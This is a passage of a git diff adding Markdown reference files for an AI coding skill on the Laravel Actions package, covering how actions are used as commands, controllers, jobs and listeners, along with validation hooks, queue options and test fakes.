+- HTTP wiring test: hit route/controller, fake downstream actions with `shouldRun` or `shouldNotRun`.
+- Job wiring test: dispatch action as job, assert expected downstream action calls.
+- Event listener test: dispatch event, assert action interaction via fake/spy.
+- Console test: run artisan command, assert action invocation and output.
+
+### Practical defaults
+
+- Prefer `shouldRun()` and `shouldNotRun()` for readability in branch tests.
+- Prefer `spy()`/`allowToRun()` when behavior is mostly real and you only need call verification.
+- Prefer `mock()` when interaction contracts are strict and should fail fast.
+- Use `clearFake()` in cleanup when a fake might leak into another test.
+- Keep side effects isolated: fake only the action under test boundary, not everything.
+
+### Pest style examples
+
+```php
+it('dispatches the downstream action', function () {
+    SendInvoiceEmail::shouldRun()->once()->withArgs(fn (int $invoiceId) => $invoiceId > 0);
+
+    FinalizeInvoice::run(123);
+});
+
+it('does not dispatch when invoice is already sent', function () {
+    SendInvoiceEmail::shouldNotRun();
+
+    FinalizeInvoice::run(123, alreadySent: true);
+});
+```
+
+Run the minimum relevant suite first, e.g. `php artisan test --compact --filter=PublishArticle` or by specific test file.
+
+## Troubleshooting Checklist
+
+- Ensure the class uses `AsAction` and namespace matches autoload.
+- Check route registration when used as controller.
+- Check queue config when using `dispatch`.
+- Verify event-to-listener mapping in `EventServiceProvider`.
+- Keep transport concerns in adapter methods (`asController`, `asCommand`, etc.), not in `handle(...)`.
+
+## Common Pitfalls
+
+- Putting HTTP response/redirect logic inside `handle(...)` instead of `asController(...)`.
+- Duplicating business rules across `as*` methods rather than delegating to `handle(...)`.
+- Assuming listener wiring works without explicit registration where required.
+- Testing only entrypoints and skipping direct `handle(...)` behavior tests.
+- Overusing Actions for one-off, single-context logic with no reuse pressure.
+
+## Topic References
+
+Use these references for deep dives by entrypoint/topic. Keep `SKILL.md` focused on workflow and decision rules.
+
+- Object entrypoint: `references/object.md`
+- Controller entrypoint: `references/controller.md`
+- Job entrypoint: `references/job.md`
+- Listener entrypoint: `references/listener.md`
+- Command entrypoint: `references/command.md`
+- With attributes: `references/with-attributes.md`
+- Testing and fakes: `references/testing-fakes.md`
+- Troubleshooting: `references/troubleshooting.md`
\ No newline at end of file
diff --git a/.claude/skills/laravel-actions/references/command.md b/.claude/skills/laravel-actions/references/command.md
new file mode 100644
index 000000000..a7b255daf
--- /dev/null
+++ b/.claude/skills/laravel-actions/references/command.md
@@ -0,0 +1,160 @@
+# Command Entrypoint (`asCommand`)
+
+## Scope
+
+Use this reference when exposing actions as Artisan commands.
+
+## Recap
+
+- Documents command execution via `asCommand(...)` and fallback to `handle(...)`.
+- Covers command metadata via methods/properties (signature, description, help, hidden).
+- Includes registration example and focused artisan test pattern.
+- Reinforces separation between console I/O and domain logic.
+
+## Recommended pattern
+
+- Define `$commandSignature` and `$commandDescription`.
+- Implement `asCommand(Command $command)` for console I/O.
+- Keep business logic in `handle(...)`.
+
+## Methods used (`CommandDecorator`)
+
+### `asCommand`
+
+Called when executed as a command. If missing, it falls back to `handle(...)`.
+
+```php
+use Illuminate\Console\Command;
+
+class UpdateUserRole
+{
+    use AsAction;
+
+    public string $commandSignature = 'users:update-role {user_id} {role}';
+
+    public function handle(User $user, string $newRole): void
+    {
+        $user->update(['role' => $newRole]);
+    }
+
+    public function asCommand(Command $command): void
+    {
+        $this->handle(
+            User::findOrFail($command->argument('user_id')),
+            $command->argument('role')
+        );
+
+        $command->info('Done!');
+    }
+}
+```
+
+### `getCommandSignature`
+
+Defines the command signature. Required when registering an action as a command if no `$commandSignature` property is set.
+
+```php
+public function getCommandSignature(): string
+{
+    return 'users:update-role {user_id} {role}';
+}
+```
+
+### `$commandSignature`
+
+Property alternative to `getCommandSignature`.
+
+```php
+public string $commandSignature = 'users:update-role {user_id} {role}';
+```
+
+### `getCommandDescription`
+
+Provides command description.
+
+```php
+public function getCommandDescription(): string
+{
+    return 'Updates the role of a given user.';
+}
+```
+
+### `$commandDescription`
+
+Property alternative to `getCommandDescription`.
+
+```php
+public string $commandDescription = 'Updates the role of a given user.';
+```
+
+### `getCommandHelp`
+
+Provides additional help text shown with `--help`.
+
+```php
+public function getCommandHelp(): string
+{
+    return 'My help message.';
+}
+```
+
+### `$commandHelp`
+
+Property alternative to `getCommandHelp`.
+
+```php
+public string $commandHelp = 'My help message.';
+```
+
+### `isCommandHidden`
+
+Defines whether command should be hidden from artisan list. Default is `false`.
+
+```php
+public function isCommandHidden(): bool
+{
+    return true;
+}
+```
+
+### `$commandHidden`
+
+Property alternative to `isCommandHidden`.
+
+```php
+public bool $commandHidden = true;
+```
+
+## Examples
+
+### Register in console kernel
+
+```php
+// app/Console/Kernel.php
+protected $commands = [
+    UpdateUserRole::class,
+];
+```
+
+### Focused command test
+
+```php
+$this->artisan('users:update-role 1 admin')
+    ->expectsOutput('Done!')
+    ->assertSuccessful();
+```
+
+## Checklist
+
+- `use Illuminate\Console\Command;` is imported.
+- Signature/options/arguments are documented.
+- Command test verifies invocation and output.
+
+## Common pitfalls
+
+- Mixing command I/O with domain logic in `handle(...)`.
+- Missing/ambiguous command signature.
+
+## References
+
+- https://www.laravelactions.com/2.x/as-command.html
\ No newline at end of file
diff --git a/.claude/skills/laravel-actions/references/controller.md b/.claude/skills/laravel-actions/references/controller.md
new file mode 100644
index 000000000..d48c34df8
--- /dev/null
+++ b/.claude/skills/laravel-actions/references/controller.md
@@ -0,0 +1,339 @@
+# Controller Entrypoint (`asController`)
+
+## Scope
+
+Use this reference when exposing an action through HTTP routes.
+
+## Recap
+
+- Documents controller lifecycle around `asController(...)` and response adapters.
+- Covers routing patterns, middleware, and optional in-action `routes()` registration.
+- Summarizes validation/authorization hooks used by `ActionRequest`.
+- Provides extension points for JSON/HTML responses and failure customization.
+
+## Recommended pattern
+
+- Route directly to action class when appropriate.
+- Keep HTTP adaptation in controller methods (`asController`, `jsonResponse`, `htmlResponse`).
+- Keep domain logic in `handle(...)`.
+
+## Methods provided (`AsController` trait)
+
+### `__invoke`
+
+Required so Laravel can register the action class as an invokable controller.
+
+```php
+$action($someArguments);
+
+// Equivalent to:
+$action->handle($someArguments);
+```
+
+If the method does not exist, Laravel route registration fails for invokable controllers.
+
+```php
+// Illuminate\Routing\RouteAction
+protected static function makeInvokable($action)
+{
+    if (! method_exists($action, '__invoke')) {
+        throw new UnexpectedValueException("Invalid route action: [{$action}].");
+    }
+
+    return $action.'@__invoke';
+}
+```
+
+If you need your own `__invoke`, alias the trait implementation:
+
+```php
+class MyAction
+{
+    use AsAction {
+        __invoke as protected invokeFromLaravelActions;
+    }
+
+    public function __invoke()
+    {
+        // Custom behavior...
+    }
+}
+```
+
+## Methods used (`ControllerDecorator` + `ActionRequest`)
+
+### `asController`
+
+Called when used as invokable controller. If missing, it falls back to `handle(...)`.
+
+```php
+public function asController(User $user, Request $request): Response
+{
+    $article = $this->handle(
+        $user,
+        $request->get('title'),
+        $request->get('body')
+    );
+
+    return redirect()->route('articles.show', [$article]);
+}
+```
+
+### `jsonResponse`
+
+Called after `asController` when request expects JSON.
+
+```php
+public function jsonResponse(Article $article, Request $request): ArticleResource
+{
+    return new ArticleResource($article);
+}
+```
+
+### `htmlResponse`
+
+Called after `asController` when request expects HTML.
+
+```php
+public function htmlResponse(Article $article, Request $request): Response
+{
+    return redirect()->route('articles.show', [$article]);
+}
+```
+
+### `getControllerMiddleware`
+
+Adds middleware directly on the action controller.
+
+```php
+public function getControllerMiddleware(): array
+{
+    return ['auth', MyCustomMiddleware::class];
+}
+```
+
+### `routes`
+
+Defines routes directly in the action.
+
+```php
+public static function routes(Router $router)
+{
+    $router->get('author/{author}/articles', static::class);
+}
+```
+
+To enable this, register routes from actions in a service provider:
+
+```php
+use Lorisleiva\Actions\Facades\Actions;
+
+Actions::registerRoutes();
+Actions::registerRoutes('app/MyCustomActionsFolder');
+Actions::registerRoutes([
+    'app/Authentication',
+    'app/Billing',
+    'app/TeamManagement',
+]);
+```
+
+### `prepareForValidation`
+
+Called before authorization and validation are resolved.
+
+```php
+public function prepareForValidation(ActionRequest $request): void
+{
+    $request->merge(['some' => 'additional data']);
+}
+```
+
+### `authorize`
+
+Defines authorization logic.
+
+```php
+public function authorize(ActionRequest $request): bool
+{
+    return $request->user()->role === 'author';
+}
+```
+
+You can also return gate responses:
+
+```php
+use Illuminate\Auth\Access\Response;
+
+public function authorize(ActionRequest $request): Response
+{
+    if ($request->user()->role !== 'author') {
+        return Response::deny('You must be an author to create a new article.');
+    }
+
+    return Response::allow();
+}
+```
+
+### `rules`
+
+Defines validation rules.
+
+```php
+public function rules(): array
+{
+    return [
+        'title' => ['required', 'min:8'],
+        'body' => ['required', IsValidMarkdown::class],
+    ];
+}
+```
+
+### `withValidator`
+
+Adds custom validation logic with an after hook.
+
+```php
+use Illuminate\Validation\Validator;
+
+public function withValidator(Validator $validator, ActionRequest $request): void
+{
+    $validator->after(function (Validator $validator) use ($request) {
+        if (! Hash::check($request->get('current_password'), $request->user()->password)) {
+            $validator->errors()->add('current_password', 'Wrong password.');
+        }
+    });
+}
+```
+
+### `afterValidator`
+
+Alternative to add post-validation checks.
+
+```php
+use Illuminate\Validation\Validator;
+
+public function afterValidator(Validator $validator, ActionRequest $request): void
+{
+    if (! Hash::check($request->get('current_password'), $request->user()->password)) {
+        $validator->errors()->add('current_password', 'Wrong password.');
+    }
+}
+```
+
+### `getValidator`
+
+Provides a custom validator instead of default rules pipeline.
+
+```php
+use Illuminate\Validation\Factory;
+use Illuminate\Validation\Validator;
+
+public function getValidator(Factory $factory, ActionRequest $request): Validator
+{
+    return $factory->make($request->only('title', 'body'), [
+        'title' => ['required', 'min:8'],
+        'body' => ['required', IsValidMarkdown::class],
+    ]);
+}
+```
+
+### `getValidationData`
+
+Defines which data is validated (default: `$request->all()`).
+
+```php
+public function getValidationData(ActionRequest $request): array
+{
+    return $request->all();
+}
+```
+
+### `getValidationMessages`
+
+Custom validation error messages.
+
+```php
+public function getValidationMessages(): array
+{
+    return [
+        'title.required' => 'Looks like you forgot the title.',
+        'body.required' => 'Is that really all you have to say?',
+    ];
+}
+```
+
+### `getValidationAttributes`
+
+Human-friendly names for request attributes.
+
+```php
+public function getValidationAttributes(): array
+{
+    return [
+        'title' => 'headline',
+        'body' => 'content',
+    ];
+}
+```
+
+### `getValidationRedirect`
+
+Custom redirect URL on validation failure.
+
+```php
+public function getValidationRedirect(UrlGenerator $url): string
+{
+    return $url->to('/my-custom-redirect-url');
+}
+```
+
+### `getValidationErrorBag`
+
+Custom error bag name on validation failure (default: `default`).
+
+```php
+public function getValidationErrorBag(): string
+{
+    return 'my_custom_error_bag';
+}
+```
+
+### `getValidationFailure`
+
+Override validation failure behavior.
+
+```php
+public function getValidationFailure(): void
+{
+    throw new MyCustomValidationException();
+}
+```
+
+### `getAuthorizationFailure`
+
+Override authorization failure behavior.
+
+```php
+public function getAuthorizationFailure(): void
+{
+    throw new MyCustomAuthorizationException();
+}
+```
+
+## Checklist
+
+- Route wiring points to the action class.
+- `asController(...)` delegates to `handle(...)`.
+- Validation/authorization methods are explicit where needed.
+- Response mapping is split by channel (`jsonResponse`, `htmlResponse`) when useful.
+- HTTP tests cover both success and validation/authorization failure branches.
+
+## Common pitfalls
+
+- Putting response/redirect logic in `handle(...)`.
+- Duplicating business rules in `asController(...)` instead of delegating.
+- Assuming action route discovery works without `Actions::registerRoutes(...)` when using in-action `routes()`.
+
+## References
+
+- https://www.laravelactions.com/2.x/as-controller.html
\ No newline at end of file
diff --git a/.claude/skills/laravel-actions/references/job.md b/.claude/skills/laravel-actions/references/job.md
new file mode 100644
index 000000000..b4c7cbea0
--- /dev/null
+++ b/.claude/skills/laravel-actions/references/job.md
@@ -0,0 +1,425 @@
+# Job Entrypoint (`dispatch`, `asJob`)
+
+## Scope
+
+Use this reference when running an action through queues.
+
+## Recap
+
+- Lists async/sync dispatch helpers and conditional dispatch variants.
+- Covers job wrapping/chaining with `makeJob`, `makeUniqueJob`, and `withChain`.
+- Documents queue assertion helpers for tests (`assertPushed*`).
+- Summarizes `JobDecorator` hooks/properties for retries, uniqueness, timeout, and failure handling.
+
+## Recommended pattern
+
+- Dispatch with `Action::dispatch(...)` for async execution.
+- Keep queue-specific orchestration in `asJob(...)`.
+- Keep reusable business logic in `handle(...)`.
+
+## Methods provided (`AsJob` trait)
+
+### `dispatch`
+
+Dispatches the action asynchronously.
+
+```php
+SendTeamReportEmail::dispatch($team);
+```
+
+### `dispatchIf`
+
+Dispatches asynchronously only if condition is met.
+
+```php
+SendTeamReportEmail::dispatchIf($team->plan === 'premium', $team);
+```
+
+### `dispatchUnless`
+
+Dispatches asynchronously unless condition is met.
+
+```php
+SendTeamReportEmail::dispatchUnless($team->plan === 'free', $team);
+```
+
+### `dispatchSync`
+
+Dispatches synchronously.
+
+```php
+SendTeamReportEmail::dispatchSync($team);
+```
+
+### `dispatchNow`
+
+Alias of `dispatchSync`.
+
+```php
+SendTeamReportEmail::dispatchNow($team);
+```
+
+### `dispatchAfterResponse`
+
+Dispatches synchronously after the HTTP response is sent.
+
+```php
+SendTeamReportEmail::dispatchAfterResponse($team);
+```
+
+### `makeJob`
+
+Creates a `JobDecorator` wrapper. Useful with `dispatch(...)` helper or chains.
+
+```php
+dispatch(SendTeamReportEmail::makeJob($team));
+```
+
+### `makeUniqueJob`
+
+Creates a `UniqueJobDecorator` wrapper. Usually automatic with `ShouldBeUnique`, but can be forced.
+
+```php
+dispatch(SendTeamReportEmail::makeUniqueJob($team));
+```
+
+### `withChain`
+
+Attaches jobs to run after successful processing.
+
+```php
+$chain = [
+    OptimizeTeamReport::makeJob($team),
+    SendTeamReportEmail::makeJob($team),
+];
+
+CreateNewTeamReport::withChain($chain)->dispatch($team);
+```
+
+Equivalent using `Bus::chain(...)`:
+
+```php
+use Illuminate\Support\Facades\Bus;
+
+Bus::chain([
+    CreateNewTeamReport::makeJob($team),
+    OptimizeTeamReport::makeJob($team),
+    SendTeamReportEmail::makeJob($team),
+])->dispatch();
+```
+
+Chain assertion example:
+
+```php
+use Illuminate\Support\Facades\Bus;
+
+Bus::fake();
+
+Bus::assertChained([
+    CreateNewTeamReport::makeJob($team),
+    OptimizeTeamReport::makeJob($team),
+    SendTeamReportEmail::makeJob($team),
+]);
+```
+
+### `assertPushed`
+
+Asserts the action was queued.
+
+```php
+use Illuminate\Support\Facades\Queue;
+
+Queue::fake();
+
+SendTeamReportEmail::assertPushed();
+SendTeamReportEmail::assertPushed(3);
+SendTeamReportEmail::assertPushed($callback);
+SendTeamReportEmail::assertPushed(3, $callback);
+```
+
+`$callback` receives:
+- Action instance.
+- Dispatched arguments.
+- `JobDecorator` instance.
+- Queue name.
+
+### `assertNotPushed`
+
+Asserts the action was not queued.
+
+```php
+use Illuminate\Support\Facades\Queue;
+
+Queue::fake();
+
+SendTeamReportEmail::assertNotPushed();
+SendTeamReportEmail::assertNotPushed($callback);
+```
+
+### `assertPushedOn`
+
+Asserts the action was queued on a specific queue.
+
+```php
+use Illuminate\Support\Facades\Queue;
+
+Queue::fake();
+
+SendTeamReportEmail::assertPushedOn('reports');
+SendTeamReportEmail::assertPushedOn('reports', 3);
+SendTeamReportEmail::assertPushedOn('reports', $callback);
+SendTeamReportEmail::assertPushedOn('reports', 3, $callback);
+```
+
+## Methods used (`JobDecorator`)
+
+### `asJob`
+
+Called when dispatched as a job. Falls back to `handle(...)` if missing.
+
+```php
+class SendTeamReportEmail
+{
+    use AsAction;
+
+    public function handle(Team $team, bool $fullReport = false): void
+    {
+        // Prepare report and send it to all $team->users.
+    }
+
+    public function asJob(Team $team): void
+    {
+        $this->handle($team, true);
+    }
+}
+```
+
+### `getJobMiddleware`
+
+Adds middleware to the queued action.
+
+```php
+public function getJobMiddleware(array $parameters): array
+{
+    return [new RateLimited('reports')];
+}
+```
+
+### `configureJob`
+
+Configures `JobDecorator` options.
+
+```php
+use Lorisleiva\Actions\Decorators\JobDecorator;
+
+public function configureJob(JobDecorator $job): void
+{
+    $job->onConnection('my_connection')
+        ->onQueue('my_queue')
+        ->through(['my_middleware'])
+        ->chain(['my_chain'])
+        ->delay(60);
+}
+```
+
+### `$jobConnection`
+
+Defines queue connection.
+
+```php
+public string $jobConnection = 'my_connection';
+```
+
+### `$jobQueue`
+
+Defines queue name.
+
+```php
+public string $jobQueue = 'my_queue';
+```
+
+### `$jobTries`
+
+Defines max attempts.
+
+```php
+public int $jobTries = 10;
+```
+
+### `$jobMaxExceptions`
+
+Defines max unhandled exceptions before failure.
+
+```php
+public int $jobMaxExceptions = 3;
+```
+
+### `$jobBackoff`
+
+Defines retry delay seconds.
+
+```php
+public int $jobBackoff = 60;
+```
+
+### `getJobBackoff`
+
+Defines retry delay (int or per-attempt array).
+
+```php
+public function getJobBackoff(): int
+{
+    return 60;
+}
+
+public function getJobBackoff(): array
+{
+    return [30, 60, 120];
+}
+```
+
+### `$jobTimeout`
+
+Defines timeout in seconds.
+
+```php
+public int $jobTimeout = 60 * 30;
+```
+
+### `$jobRetryUntil`
+
+Defines timestamp retry deadline.
+
+```php
+public int $jobRetryUntil = 1610191764;
+```
+
+### `getJobRetryUntil`
+
+Defines retry deadline as `DateTime`.
+
+```php
+public function getJobRetryUntil(): DateTime
+{
+    return now()->addMinutes(30);
+}
+```
+
+### `getJobDisplayName`
+
+Customizes queued job display name.
+
+```php
+public function getJobDisplayName(): string
+{
+    return 'Send team report email';
+}
+```
+
+### `getJobTags`
+
+Adds queue tags.
+
+```php
+public function getJobTags(Team $team): array
+{
+    return ['report', 'team:'.$team->id];
+}
+```
+
+### `getJobUniqueId`
+
+Defines uniqueness key when using `ShouldBeUnique`.
+
+```php
+public function getJobUniqueId(Team $team): int
+{
+    return $team->id;
+}
+```
+
+### `$jobUniqueId`
+
+Static uniqueness key alternative.
+
+```php
+public string $jobUniqueId = 'some_static_key';
+```
+
+### `getJobUniqueFor`
+
+Defines uniqueness lock duration in seconds.
+
+```php
+public function getJobUniqueFor(Team $team): int
+{
+    return $team->role === 'premium' ? 1800 : 3600;
+}
+```
+
+### `$jobUniqueFor`
+
+Property alternative for uniqueness lock duration.
+
+```php
+public int $jobUniqueFor = 3600;
+```
+
+### `getJobUniqueVia`
+
+Defines cache driver used for uniqueness lock.
+
+```php
+public function getJobUniqueVia()
+{
+    return Cache::driver('redis');
+}
+```
+
+### `$jobDeleteWhenMissingModels`
+
+Property alternative for missing model handling.
+
+```php
+public bool $jobDeleteWhenMissingModels = true;
+```
+
+### `getJobDeleteWhenMissingModels`
+
+Defines whether jobs with missing models are deleted.
+
+```php
+public function getJobDeleteWhenMissingModels(): bool
+{
+    return true;
+}
+```
+
+### `jobFailed`
+
+Handles job failure. Receives exception and dispatched parameters.
+
+```php
+public function jobFailed(?Throwable $e, ...$parameters): void
+{
+    // Notify users, report errors, trigger compensations...
+}
+```
+
+## Checklist
+
+- Async/sync dispatch method matches use-case (`dispatch`, `dispatchSync`, `dispatchAfterResponse`).
+- Queue config is explicit when needed (`$jobConnection`, `$jobQueue`, `configureJob`).
+- Retry/backoff/timeout policies are intentional.
+- `asJob(...)` delegates to `handle(...)` unless queue-specific branching is required.
+- Queue tests use `Queue::fake()` and action assertions (`assertPushed*`).
+
+## Common pitfalls
+
+- Embedding domain logic only in `asJob(...)`.
+- Forgetting uniqueness/timeout/retry controls on heavy jobs.
+- Missing queue-specific assertions in tests.
+
+## References
+
+- https://www.laravelactions.com/2.x/as-job.html
\ No newline at end of file
diff --git a/.claude/skills/laravel-actions/references/listener.md b/.claude/skills/laravel-actions/references/listener.md
new file mode 100644
index 000000000..c5233001d
--- /dev/null
+++ b/.claude/skills/laravel-actions/references/listener.md
@@ -0,0 +1,81 @@
+# Listener Entrypoint (`asListener`)
+
+## Scope
+
+Use this reference when wiring actions to domain/application events.
+
+## Recap
+
+- Shows how listener execution maps event payloads into `handle(...)` arguments.
+- Describes `asListener(...)` fallback behavior and adaptation role.
+- Includes event registration example for provider wiring.
+- Emphasizes test focus on dispatch and action interaction.
+
+## Recommended pattern
+
+- Register action listener in `EventServiceProvider` (or project equivalent).
+- Use `asListener(Event $event)` for event adaptation.
+- Delegate core logic to `handle(...)`.
+
+## Methods used (`ListenerDecorator`)
+
+### `asListener`
+
+Called when executed as an event listener. If missing, it falls back to `handle(...)`.
+
+```php
+class SendOfferToNearbyDrivers
+{
+    use AsAction;
+
+    public function handle(Address $source, Address $destination): void
+    {
+        // ...
+    }
+
+    public function asListener(TaxiRequested $event): void
+    {
+        $this->handle($event->source, $event->destination);
+    }
+}
+```
+
+## Examples
+
+### Event registration
+
+```php
+// app/Providers/EventServiceProvider.php
+protected $listen = [
+    TaxiRequested::class => [
+        SendOfferToNearbyDrivers::class,
+    ],
+];
+```
+
+### Focused listener test
+
+```php
+use Illuminate\Support\Facades\Event;
+
+Event::fake();
+
+TaxiRequested::dispatch($source, $destination);
+
+Event::assertDispatched(TaxiRequested::class);
+```
+
+## Checklist
+
+- Event-to-listener mapping is registered.
+- Listener method signature matches event contract.
+- Listener tests verify dispatch and action interaction.
+
+## Common pitfalls
+
+- Assuming automatic listener registration when explicit mapping is required.
+- Re-implementing business logic in `asListener(...)`.
+
+## References
+
+- https://www.laravelactions.com/2.x/as-listener.html
\ No newline at end of file
diff --git a/.claude/skills/laravel-actions/references/object.md b/.claude/skills/laravel-actions/references/object.md
new file mode 100644
index 000000000..6a90be4d5
--- /dev/null
+++ b/.claude/skills/laravel-actions/references/object.md
@@ -0,0 +1,118 @@
+# Object Entrypoint (`run`, `make`, DI)
+
+## Scope
+
+Use this reference when the action is invoked as a plain object.
+
+## Recap
+
+- Explains object-style invocation with `make`, `run`, `runIf`, `runUnless`.
+- Clarifies when to use static helpers versus DI/manual invocation.
+- Includes minimal examples for direct run and service-level injection.
+- Highlights boundaries: business logic stays in `handle(...)`.
+
+## Recommended pattern
+
+- Keep core business logic in `handle(...)`.
+- Prefer `Action::run(...)` for readability.
+- Use `Action::make()->handle(...)` or DI only when needed.
+
+## Methods provided
+
+### `make`
+
+Resolves the action from the container.
+
+```php
+PublishArticle::make();
+
+// Equivalent to:
+app(PublishArticle::class);
+```
+
+### `run`
+
+Resolves and executes the action.
+
+```php
+PublishArticle::run($articleId);
+
+// Equivalent to:
+PublishArticle::make()->handle($articleId);
+```
+
+### `runIf`
+
+Resolves and executes the action only if the condition is met.
+
+```php
+PublishArticle::runIf($shouldPublish, $articleId);
+
+// Equivalent mental model:
+if ($shouldPublish) {
+    PublishArticle::run($articleId);
+}
+```
+
+### `runUnless`
+
+Resolves and executes the action only if the condition is not met.
+
+```php
+PublishArticle::runUnless($alreadyPublished, $articleId);
+
+// Equivalent mental model:
+if (! $alreadyPublished) {
+    PublishArticle::run($articleId);
+}
+```
+
+## Checklist
+
+- Input/output types are explicit.
+- `handle(...)` has no transport concerns.
+- Business behavior is covered by direct `handle(...)` tests.
+
+## Common pitfalls
+
+- Putting HTTP/CLI/queue concerns in `handle(...)`.
+- Calling adapters from `handle(...)` instead of the reverse.
+
+## References
+
+- https://www.laravelactions.com/2.x/as-object.html
+
+## Examples
+
+### Minimal object-style invocation
+
+```php
+final class PublishArticle
+{
+    use AsAction;
+
+    public function handle(int $articleId): bool
+    {
+        // Domain logic...
+        return true;
+    }
+}
+
+$published = PublishArticle::run(42);
+```
+
+### Dependency injection invocation
+
+```php
+final class ArticleService
+{
+    public function __construct(
+        private PublishArticle $publishArticle
+    ) {}
+
+    public function publish(int $articleId): bool
+    {
+        return $this->publishArticle->handle($articleId);
+    }
+}
+```
\ No newline at end of file
diff --git a/.claude/skills/laravel-actions/references/testing-fakes.md b/.claude/skills/laravel-actions/references/testing-fakes.md
new file mode 100644
index 000000000..97766e6ce
--- /dev/null
+++ b/.claude/skills/laravel-actions/references/testing-fakes.md
@@ -0,0 +1,160 @@
+# Testing and Action Fakes
+
+## Scope
+
+Use this reference when isolating action orchestration in tests.
+
+## Recap
+
+- Summarizes all `AsFake` helpers (`mock`, `partialMock`, `spy`, `shouldRun`, `shouldNotRun`, `allowToRun`).
+- Clarifies when to assert execution versus non-execution.
+- Covers fake lifecycle checks/reset (`isFake`, `clearFake`).
+- Provides branch-oriented test examples for orchestration confidence.
+
+## Core methods
+
+- `mock()`
+- `partialMock()`
+- `spy()`
+- `shouldRun()`
+- `shouldNotRun()`
+- `allowToRun()`
+- `isFake()`
+- `clearFake()`
+
+## Recommended pattern
+
+- Test `handle(...)` directly for business rules.
+- Test entrypoints for wiring/orchestration.
+- Fake only at the boundary under test.
+
+## Methods provided (`AsFake` trait)
+
+### `mock`
+
+Swaps the action with a full mock.
+
+```php
+FetchContactsFromGoogle::mock()
+    ->shouldReceive('handle')
+    ->with(42)
+    ->andReturn(['Loris', 'Will', 'Barney']);
+```
+
+### `partialMock`
+
+Swaps the action with a partial mock.
+
+```php
+FetchContactsFromGoogle::partialMock()
+    ->shouldReceive('fetch')
+    ->with('some_google_identifier')
+    ->andReturn(['Loris', 'Will', 'Barney']);
+```
+
+### `spy`
+
+Swaps the action with a spy.
+
+```php
+$spy = FetchContactsFromGoogle::spy()
+    ->allows('handle')
+    ->andReturn(['Loris', 'Will', 'Barney']);
+
+// ...
+
+$spy->shouldHaveReceived('handle')->with(42);
+```
+
+### `shouldRun`
+
+Helper adding expectation on `handle`.
+
+```php
+FetchContactsFromGoogle::shouldRun();
+
+// Equivalent to:
+FetchContactsFromGoogle::mock()->shouldReceive('handle');
+```
+
+### `shouldNotRun`
+
+Helper adding negative expectation on `handle`.
+
+```php
+FetchContactsFromGoogle::shouldNotRun();
+
+// Equivalent to:
+FetchContactsFromGoogle::mock()->shouldNotReceive('handle');
+```
+
+### `allowToRun`
+
+Helper allowing `handle` on a spy.
+
+```php
+$spy = FetchContactsFromGoogle::allowToRun()
+    ->andReturn(['Loris', 'Will', 'Barney']);
+
+// ...
+
+$spy->shouldHaveReceived('handle')->with(42);
+```
+
+### `isFake`
+
+Returns whether the action has been swapped with a fake.
+
+```php
+FetchContactsFromGoogle::isFake(); // false
+FetchContactsFromGoogle::mock();
+FetchContactsFromGoogle::isFake(); // true
+```
+
+### `clearFake`
+
+Clears the fake instance, if any.
+
+```php
+FetchContactsFromGoogle::mock();
+FetchContactsFromGoogle::isFake(); // true
+FetchContactsFromGoogle::clearFake();
+FetchContactsFromGoogle::isFake(); // false
+```
+
+## Examples
+
+### Orchestration test
+
+```php
+it('runs sync contacts for premium teams', function () {
+    SyncGoogleContacts::shouldRun()->once()->with(42)->andReturnTrue();
+
+    ImportTeamContacts::run(42, isPremium: true);
+});
+```
+
+### Guard-clause test
+
+```php
+it('does not run sync when integration is disabled', function () {
+    SyncGoogleContacts::shouldNotRun();
+
+    ImportTeamContacts::run(42, integrationEnabled: false);
+});
+```
+
+## Checklist
+
+- Assertions verify call intent and argument contracts.
+- Fakes are cleared when leakage risk exists.
+- Branch tests use `shouldRun()` / `shouldNotRun()` where clearer.
+
+## Common pitfalls
+
+- Over-mocking and losing behavior confidence.
+- Asserting only dispatch, not business correctness.
+
+## References
+
+- https://www.laravelactions.com/2.x/as-fake.html
\ No newline at end of file
diff --git a/.claude/skills/laravel-actions/references/troubleshooting.md b/.claude/skills/laravel-actions/references/troubleshooting.md
new file mode 100644
index 000000000..cf6a5800f
--- /dev/null
+++ b/.claude/skills/laravel-actions/references/troubleshooting.md
@@ -0,0 +1,33 @@
+# Troubleshooting
+
+## Scope
+
+Use this reference when action wiring behaves unexpectedly.
+
+## Recap
+
+- Provides a fast triage flow for routing, queueing, events, and command wiring.
+- Lists recurring failure patterns and where to check first.
+- Encourages reproducing issues with focused tests before broad debugging.
+- Separates wiring diagnostics from domain logic verification.
+
+## Fast checks
+
+- Action class uses `AsAction`.
+- Namespace and autoloading are correct.
+- Entrypoint wiring (route, queue, event, command) is registered.
+- Method signatures and argument types match caller expectations.
+
+## Failure patterns
+
+- Controller route points to wrong class.
+- Queue worker/config mismatch.
+- Listener mapping not loaded.
+- Command signature mismatch.
+- Command not registered in the console kernel.
+
+## Debug checklist
+
+- Reproduce with a focused failing test.
+- Validate wiring layer first, then domain behavior.
+- Isolate dependencies with fakes/spies where appropriate.
\ No newline at end of file
diff --git a/.claude/skills/laravel-actions/references/with-attributes.md b/.claude/skills/laravel-actions/references/with-attributes.md
new file mode 100644
index 000000000..1b28cf2cb
--- /dev/null
+++ b/.claude/skills/laravel-actions/references/with-attributes.md
@@ -0,0 +1,189 @@
+# With Attributes (`WithAttributes` trait)
+
+## Scope
+
+Use this reference when an action stores and validates input via internal attributes instead of method arguments.
+
+## Recap
+
+- Documents attribute lifecycle APIs (`setRawAttributes`, `fill`, `fillFromRequest`, readers/writers).
+- Clarifies behavior of key collisions (`fillFromRequest`: request data wins over route params).
+- Lists validation/authorization hooks reused from controller validation pipeline.
+- Includes end-to-end example from fill to `validateAttributes()` and `handle(...)`.
+
+## Methods provided (`WithAttributes` trait)
+
+### `setRawAttributes`
+
+Replaces all attributes with the provided payload.
+
+```php
+$action->setRawAttributes([
+    'key' => 'value',
+]);
+```
+
+### `fill`
+
+Merges provided attributes into existing attributes.
+
+```php
+$action->fill([
+    'key' => 'value',
+]);
+```
+
+### `fillFromRequest`
+
+Merges request input and route parameters into attributes. Request input has priority over route parameters when keys collide.
+
+```php
+$action->fillFromRequest($request);
+```
+
+### `all`
+
+Returns all attributes.
+
+```php
+$action->all();
+```
+
+### `only`
+
+Returns attributes matching the provided keys.
+
+```php
+$action->only('title', 'body');
+```
+
+### `except`
+
+Returns attributes excluding the provided keys.
+
+```php
+$action->except('body');
+```
+
+### `has`
+
+Returns whether an attribute exists for the given key.
+
+```php
+$action->has('title');
+```
+
+### `get`
+
+Returns the attribute value by key, with optional default.
+
+```php
+$action->get('title');
+$action->get('title', 'Untitled');
+```
+
+### `set`
+
+Sets an attribute value by key.
+
+```php
